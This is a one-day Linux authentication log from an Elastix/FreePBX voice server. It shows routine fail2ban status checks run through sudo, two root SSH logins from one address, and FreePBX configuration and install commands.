      Jun 9 09:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:17:51 voicesrv01 sshd[15163]: Accepted password for root from 98.242.248.14 port 58874 ssh2
      Jun 9 09:17:51 voicesrv01 sshd[15163]: pam_unix(sshd:session): session opened for user root by (uid=0)
      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKWEBGROUP asterisk
      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKWEBUSER asterisk
      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKGROUP asterisk
      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKUSER asterisk
      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPDEVGROUP asterisk
      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPDEVUSER asterisk
      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting ASTMANAGERHOST localhost
      Jun 9 09:20:05 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/retrieve_conf --run-install --skip-registry-checks
      Jun 9 09:23:59 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:23:59 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table httpd
      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table asterisk
      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table sshd
      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table vsftpd
      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --dumpiptables
      Jun 9 09:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:08:18 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table httpd
      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table asterisk
      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table sshd
      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table vsftpd
      Jun 9 13:08:20 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --dumpiptables
      Jun 9 13:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:51:21 voicesrv01 sshd[15163]: pam_unix(sshd:session): session closed for user root
      Jun 9 16:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:14:09 voicesrv01 sshd[30173]: Accepted password for root from 98.242.248.14 port 52790 ssh2
      Jun 9 20:14:09 voicesrv01 sshd[30173]: pam_unix(sshd:session): session opened for user root by (uid=0)
      Jun 9 20:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
